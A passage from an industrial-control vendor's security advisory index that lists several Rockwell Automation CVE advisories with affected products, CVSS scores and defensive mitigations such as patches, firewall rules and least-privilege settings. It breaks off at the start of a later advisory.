CVE-2020-5806, CVE-2020-5801, CVE-2020-5802, CVE-2020-5807
Products:
FactoryTalk Linx Gateway, FactoryTalk Services Platform, FactoryTalk Linx / RSLinx Enterprise
CVSS Scores:
7.5, 6.2, 4.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
2.0
Revision History
Version 3.0 - January 22, 2021. Updated and Corrected Risk Mitigation & User Actions.
Version 2.0 - January 14, 2021. Updated Risk Mitigation & User Actions.
Version 1.0 - December 27, 2020. Initial Version.

Executive Summary

Rockwell Automation received a report from Tenable regarding 4 vulnerabilities. Three of these vulnerabilities are within FactoryTalk® Linx software and the fourth is in FactoryTalk Services Platform. If successfully exploited, these vulnerabilities may result in denial-of-service conditions.

Nearly all FactoryTalk software ships with a FactoryTalk Services Platform. If you are unsure if you have the FactoryTalk Services Platform installed, please see Knowledgebase ID QA5266 for additional details.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

Vulnerability / Affected Products
CVE-2020-5801: FactoryTalk Linx version 6.20 and earlier.
CVE-2020-5802: FactoryTalk Linx version 6.20 and earlier.
CVE-2020-5806: FactoryTalk Linx versions 6.10, 6.11, and 6.20.
CVE-2020-5807: FactoryTalk Services Platform version 6.20 and earlier.

Vulnerability Details

CVE-2020-5801 and CVE-2020-5802: Denial-of-Service due to Unhandled Exception
An unhandled exception vulnerability exists within a .dll in FactoryTalk Linx. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in the termination of RSLinxNG.exe, causing a denial-of-service condition.

CVSS v3.1 Base Score: 7.5 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-5806: Denial-of-Service due to Buffer Overflow
A buffer overflow vulnerability exists within a .dll in FactoryTalk Linx. This vulnerability could allow a local, unauthenticated attacker to send a malicious packet resulting in the termination of RSLinxNG.exe causing a denial-of-service condition.

CVSS v3.1 Base Score: 6.2 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-5807: Denial-of-Service due to Buffer Overflow
A buffer overflow vulnerability exists within a .dll in FactoryTalk Services Platform. This vulnerability could be exploited via a phishing attack in which an attacker sends a specially crafted log file to a local user. When the malicious log file is opened by a local user, it can cause a buffer overflow in the FactoryTalk Services Platform resulting in temporary denial-of-service conditions. Users can recover from the condition by reopening the impacted software.

CVSS v3.1 Base Score: 4.3 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected software are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Version 3.0: Correction
Vulnerability / Suggested Actions
CVE-2020-5801, CVE-2020-5802:
  • Version 2.0: Apply patch found in BF26285.
  • Version 1.0: Apply Internet Protocol Security (IPSec) to provide security services for IP network traffic. For more information on how to apply IPSec, see Knowledge Base ID QA46277.
CVE-2020-5806: Version 3.0: Apply patch found in BF26287.
CVE-2020-5807: For FactoryTalk Services Platform v6.20 see Patch Answer ID BF26157.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware keyswitch setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation® products, see Knowledgebase Article ID BF7490.
Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use Microsoft® AppLocker or other similar allow list applications that can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
Social Engineering Mitigation Strategies
  • Do not open untrusted .ftd files with FactoryTalk Services Platform.
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

High
PN1113 | PN1113 | CVE-2020-0601 Impact to Rockwell Automation Products
Published Date:
January 20, 2021
Last Updated:
January 20, 2021
CVE IDs:
CVE-2020-0601
Products:
FactoryTalk Analytics for Devices, FactoryTalk Analytics LogixAI, 1756 ControlLogix I/O
CVSS Scores:
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
2.0
Revision History
Version 2.0 - January 20, 2021 - Updated Risk Mitigations and Recommended User Actions.
Version 1.1 - January 31, 2020
Version 1.0 - January 17, 2020

Executive Summary

On Tuesday, January 14, 2020, Microsoft issued a patch and advisory addressing a major crypto vulnerability affecting Windows 10, Windows 10 IoT Core and Enterprise, and Windows Server 2016 and 2019. This vulnerability, identified as CVE-2020-0601, is also being referred to as "CurveBall," and exists in the way Crypt32.dll validates Elliptic Curve Cryptography (ECC) certificates. This vulnerability breaks the chain of trust and could allow an attacker to sign a malicious executable, intercept and modify TLS-encrypted traffic, or spoof Authenticode code signing certificates. The National Security Agency (NSA) coordinated the information and release of this vulnerability with Microsoft.

The Rockwell Automation® Product Security Incident Response Team (PSIRT) has been tracking this vulnerability since its release. At the time of writing, Rockwell Automation products are not being directly targeted, but are impacted by vulnerable Windows 10 IoT installations. Please see the Affected Products for a full list of potentially affected Rockwell Automation products.

An investigation is ongoing. Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as information becomes available.

Affected Products

Microsoft Windows 10 IoT Core and Enterprise editions are impacted by this vulnerability. At the time of publishing, the following Rockwell Automation products are impacted by CVE-2020-0601:

  • CompactLogix 5480 Controllers
  • FactoryTalk Analytics for Devices
  • FactoryTalk Analytics LogixAI
  • ControlLogix Compute Module (1756-CMS1B1)

Vulnerability Details

CVE: 2020-0601: Windows CryptoAPI Spoofing Vulnerability

Description: A vulnerability exists in the way Windows CryptoAPI validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.

  • Microsoft Assigned CVSSv3.0 Base Score: 8.1
  • Microsoft Assigned CVSSv3.0 Vector String: AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Risk Mitigation & User Action

Customers should understand their potential exposure to this vulnerability by completing a thorough asset inventory and assessment.

Vulnerability: CVE-2020-0601
Rockwell Automation Products:
  • CompactLogix 5480 Controllers
  • ControlLogix Compute Module (1756-CMS1B1)
Suggested Actions: Microsoft released a patch for affected versions of Windows on January 14, 2020. Patch via Windows Update Service or normal patching process.

Vulnerability: CVE-2020-0601
Rockwell Automation Product:
  • FactoryTalk Analytics LogixAI
Suggested Actions: Install the Microsoft Cumulative Security Updates on FactoryTalk Analytics LogixAI; refer to QA58887.

Otherwise, Rockwell Automation will provide a firmware update for the products noted. Patches are not yet available for these products. When the patches are available, this article will be updated.

Vulnerability: CVE-2020-0601
Rockwell Automation Product:
  • FactoryTalk Analytics for Devices
Suggested Actions: To reduce risk, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Deploying a Resilient Converged Plantwide Ethernet Architecture Design and Implementation Guide.

Customers using Rockwell Automation industrial compute solutions, such as VersaView computers, Industrial Data Centers, etc., are recommended to regularly inventory and patch their host operating systems.

Update on 1/31/2020: Rockwell Automation MS Patch Qualification team successfully qualified the Microsoft patch related to Curveball. Full results and other useful information can be found here.

General Security Guidelines

  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that communications from unauthorized sources are blocked.
  • Use trusted software, software patches, antivirus/antimalware programs, and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

  • CVE-2020-0601 Windows CryptoAPI Spoofing Vulnerability
  • Microsoft Windows CryptoAPI fails to properly validate ECC certificate chains
  • Patch Critical Cryptographic Vulnerability in Microsoft Windows Clients and Servers

High
PN1548 | PN1548 | Allen-Bradley MicroLogix 1100 Programmable Logic Controller IPv4 Denial-of-Service Vulnerability
Published Date:
January 19, 2021
Last Updated:
January 19, 2021
CVE IDs:
CVE-2020-6111
Products:
1763 MicroLogix 1100
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - January 19, 2021. Initial Release.

Executive Summary

Rockwell Automation received a report from the Cisco® Talos™ team regarding a vulnerability in the Allen-Bradley® MicroLogix™ 1100 controller. If successfully exploited, this vulnerability may result in denial-of-service conditions.

Customers using affected versions of this controller are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1100, all versions.

Vulnerability Details

CVE-2020-6111: Improper Processing of IPv4 Packets May Result in Denial-of-Service Conditions
A vulnerability exists in the processing of ICMP packets with an invalid IPv4 length in the MicroLogix 1100. This vulnerability could allow a remote, unauthenticated attacker to send malformed packets and cause the controller to enter an 8H Hard Fault. This event would lead to denial-of-service conditions. To recover from the condition, the controller must be power cycled and the project redownloaded.

CVSS v3.1 Base Score: 7.5/10 [HIGH]
CVSS v3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected controllers are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.
Vulnerability / Suggested Actions
CVE-2020-6111: Migrate to MicroLogix 1400 and apply firmware v21.006 or later.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware key mode setting, which may be used to block unauthorized changes.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices, or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID BF7490.
General Mitigations
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnowledgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2020-6111

Medium
PN1542 | PN1542 | Side-Channel Issue on NXP 7x Secure Authentication Microcontrollers May Lead to ECC Key Extraction
Published Date:
January 14, 2021
Last Updated:
January 14, 2021
CVE IDs:
CVE-2021-3011
Products:
5069-L330ERMS2K, 5069-L340ERMS2, PowerFlex 6000, 5069-L3100ERS2, PowerFlex 755, 5069-L3100ERMS2, 5069-L306ERMS2, 2198 Kinetix 5700 Drive, iTRAK, 5069-L350ERMS2K, 5069-L320ERMS2K, 5069-L320ERMS2, 5069-L330ERS2K, 5069-L330ERMS2, 5069-L320ERS2K, 5069-L350ERS2K, 5069 Compact GuardLogix 5380, 5069-L380ERMS2, PowerFlex 755T, 1756 ControlLogix, 5069-L350ERMS2, 5069-L380ERS2
CVSS Scores:
4.9
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - January 14, 2021. Initial Release.

Executive Summary

A report has been released regarding a vulnerability in the NXP 7x series microcontroller. If successfully exploited, this vulnerability may result in the extraction of a unique private key. This unique key is used to verify the authenticity of the affected Rockwell Automation® products.

Customers using affected products are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • 1756-EN2T
  • 1756-EN4T
  • 1756-EN4TR
  • ControlLogix® 5580 Series
    • 1756-L81EK, -L82EK, -L83EK, -L84EK, -L85EK
    • 1756-L81EP, -L83EP, -L85EP
    • 1756-L81E-NSE, 1756-L82E-NSE, 1756-L83E-NSE, 1756-L84E-NSE, 1756-L85E-NSE
    • 1756-L81EXT, 1756-L82EXT, 1756-L83EXT, 1756-L84EXT, 1756-L85EXT
  • GuardLogix 5580 Series
    • 1756-L81ES, -L82ES, -L83ES, -L84ES, -L8SP
    • 1756-L81ESK, -L82ESK, -L83ESK, -L84ESK, -L8SPK
  • Compact GuardLogix® 5380 Series
    • 5069-L306ERMS2
    • 5069-L306ERMS3
    • 5069-L306ERS2
    • 5069-L3100ERMS2
    • 5069-L3100ERMS3
    • 5069-L3100ERS2
    • 5069-L310ERMS2
    • 5069-L310ERMS3
    • 5069-L310ERS2
    • 5069-L320ERMS2
    • 5069-L320ERMS2K
    • 5069-L320ERMS3
    • 5069-L320ERMS3K
    • 5069-L320ERS2
    • 5069-L320ERS2K
    • 5069-L330ERMS2
    • 5069-L330ERMS2K
    • 5069-L330ERMS3
    • 5069-L330ERMS3K
    • 5069-L330ERS2
    • 5069-L330ERS2K
    • 5069-L340ERMS2
    • 5069-L340ERMS3
    • 5069-L340ERS2
    • 5069-L350ERMS2
    • 5069-L350ERMS2K
    • 5069-L350ERMS3
    • 5069-L350ERMS3K
    • 5069-L350ERS2
    • 5069-L350ERS2K
    • 5069-L380ERMS2
    • 5069-L380ERMS3
    • 5069-L380ERS2
  • CompactLogix™ 5380 Series
    • 5069-L306ER
    • 5069-L306ERM
    • 5069-L310ER
    • 5069-L310ER-NSE
    • 5069-L310ERM
    • 5069-L320ER
    • 5069-L320ERM
    • 5069-L320ERMK
    • 5069-L320ERP
    • 5069-L330ER
    • 5069-L330ERM
    • 5069-L330ERMK
    • 5069-L340ER
    • 5069-L340ERM
    • 5069-L340ERP
    • 5069-L350ERM
    • 5069-L350ERMK
    • 5069-L380ERM
    • 5069-L3100ERM
  • 5069-AEN2TR
  • CompactLogix™ 5480 Series
    • 5069-L4100ERMW
    • 5069-L4200ERMW
    • 5069-L430ERMW
    • 5069-L450ERMW
    • 5069-L46ERMW
  • iTRAK® 5730 Small Frame
  • iTRAK 5750C
  • Kinetix® 5700 Series B - DAI, HPI, LFI, AFE
  • PowerFlex® 6000T
  • PowerFlex 755 TL
  • PowerFlex 755 TM
  • PowerFlex 755 TR

Vulnerability Details

CVE-2021-3011: Side-Channel Leakage of Unique ECC Private Key on NXP 7X Series Chip
The NXP A700X chip contains a vulnerability that may allow an attacker to physically extract ECC private keys. Expertise and specialized equipment are required to successfully open the package, extract, and process the side-channel leakage. Successful exploit of this vulnerability may allow an attacker to obtain the unique ECC private key for that chip only. The chip will also be physically damaged. For controllers, this unique key is currently used only during the initial deployment of CIP Security.

CVSS v3.1 Base Score: 4.9/10 [MEDIUM]
CVSS v3.1 Vector: CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N

Risk Mitigation & User Action

Rockwell Automation encourages customers, when possible, to follow industry best practices for physical access including, but not limited to:
  • Limiting physical access to authorized personnel: control room, cells/areas, control panels, and devices.
  • Providing training and communication to personnel to raise awareness of threats.
  • Implementing physical barriers such as locked cabinets.

Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

General Security Guidelines

General Mitigations
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • PN1354 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • CVE-2021-3011

High
PN1541 | PN1541 | FactoryTalk AssetCentre affected by M and M Software fdtCONTAINER Remote Code Execution Vulnerability
Published Date:
January 11, 2021
Last Updated:
January 11, 2021
CVE IDs:
CVE-2020-12525
Products:
FactoryTalk AssetCentre
CVSS Scores:
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
January 11, 2021. Initial Version.

Executive Summary

Rockwell Automation received a report from M&M Software regarding a vulnerability in the fdtCONTAINER component. fdtCONTAINER is distributed as part of FactoryTalk® AssetCentre software. If successfully exploited, this vulnerability may result in remote code execution.

This vulnerability does not impact FactoryTalk AssetCentre users who have not purchased the Process Device Configuration (SKU: 9515-ASTPRD*) capability or Calibration Management capability (SKU: 9515-ASTCAL*).

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

FactoryTalk AssetCentre v9.00.00 and below with Process Device Configuration or Calibration Management capability.

Vulnerability Details

CVE-2020-12525: Deserialization of Untrusted Data May Result in Remote Code Execution
A deserialization vulnerability exists in the fdtCONTAINER component in FactoryTalk AssetCentre. This vulnerability could be exploited via a phishing attack in which an attacker sends a specially crafted project file to a local user. When the malicious project file is opened by the local user, it may execute malicious code with the user rights of FactoryTalk AssetCentre.

CVSS v3.1 Base Score: 8.6/10 [HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions of FactoryTalk AssetCentre are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability: CVE-2020-12525
Suggested Actions: Deny access to PDC Field Edition. To do this, follow the steps below.

To deny access to PDC Field Edition:
  1. Open FactoryTalk Admin Console
  2. Select “System”
  3. Select “Policies”
  4. Select “FactoryTalk AssetCentre”
  5. Open “Feature Security Properties”
  6. Locate “Run PDC Field Edition” under “Process Device Configuration Policies” and select the ellipses (…) next to “Configure Security”.
  7. Select the “Deny” Checkboxes for “Administrators” and “All Users”
  8. Select “OK”
  9. Select “Apply”

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article ID 898270.

Software/PC-based Mitigation Strategies
  • Do not use standalone PDC Field Edition
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use Microsoft® AppLocker or another similar allow list application to help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID 546989.
  • Confirm that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

Social Engineering Mitigation Strategies
  • Do not open untrusted files with FactoryTalk AssetCentre.
  • Do not click or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

See our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

Critical
PN1539 | PN1539 | Vulnerabilities in the Kepware OPC UA server interface may lead to Denial-of-Service Conditions or Data Leak
Published Date:
December 17, 2020
Last Updated:
December 17, 2020
CVE IDs:
CVE-2020-27267, CVE-2020-27263
Products:
ThingWorx Industrial Connectivity, ThingWorx, Kepserver Enterprise
CVSS Scores:
7.5, 9.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - December 17, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from PTC, a strategic partner of Rockwell Automation, regarding vulnerabilities in the Kepware OPC UA server interface for KEPServer Enterprise, ThingWorx® Kepware Server, and ThingWorx Industrial Connectivity. If successfully exploited, these vulnerabilities may result in the product ceasing to function. This may cause the following impacts: a loss of ability to configure the application, a loss of data, a loss of data acquisition, or a loss of communication with control system assets.

Customers using affected versions of this server are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

KEPServer Enterprise, versions 6.6.504.0; 6.9.572.0
ThingWorx Industrial Connectivity, all versions
ThingWorx Kepware Server, all versions

Vulnerability Details


CVE-2020-27263: Heap-based Buffer Overflow
The affected products are vulnerable to a heap-based buffer overflow. Opening a specifically crafted OPC message could allow a remote attacker to crash the server and potentially leak data.

CVSS v3.1 Base Score: 9.1 [Critical]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H


CVE-2020-27267: Use After Free
The affected products are vulnerable to a use after free vulnerability, which may allow an attacker to create and close OPC UA connections at a high rate that may cause a server to crash. Successful exploitation of this vulnerability may result in denial-of-service conditions.

CVSS v3.1 Base Score: 7.5 [High]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected products are encouraged to update to an available firmware revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below and are encouraged, when possible, to combine these options with the general security guidelines to employ multiple strategies simultaneously.

PTC recommends that users upgrade to the most current supported version.
Recommended User Actions, by base version of the affected product:

Affected Product                             | 6.6                             | 6.7                          | 6.8                     | 6.9
KEPServer Enterprise (Download)              | Apply version 6.6.550.0         | --                           | --                      | Apply version 6.9.584.0
Thingworx Kepware Server (Download)          | --                              | --                           | Apply version 6.8.839.0 | Apply version 8.9.584.0
Thingworx Industrial Connectivity (Download) | Apply version 8.4 (6.6.362.0)   | Apply version 8.5 (6.7.1068) | --                      | --

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources is blocked.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID 494865.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that a VPN is only as secure as the connected devices.


For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: 54102 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).



ADDITIONAL LINKS
  • 54102 - Industrial Security Advisory Index
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide
  • https://us-cert.cisa.gov/ics/advisories/icsa-20-352-02

Critical
PN1536 | PN1536 | FactoryTalk® Linx® Affected by Multiple Denial-of-Service and Heap Overflow Vulnerabilities
Published Date:
November 24, 2020
Last Updated:
November 24, 2020
CVE IDs:
CVE-2020-27251, CVE-2020-27255, CVE-2020-27253
Products:
FactoryTalk Linx Gateway
CVSS Scores:
8.6, 9.8, 5.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
1.0
Revision History
Version 1.0 - November 24, 2020. Initial Release.

Executive Summary

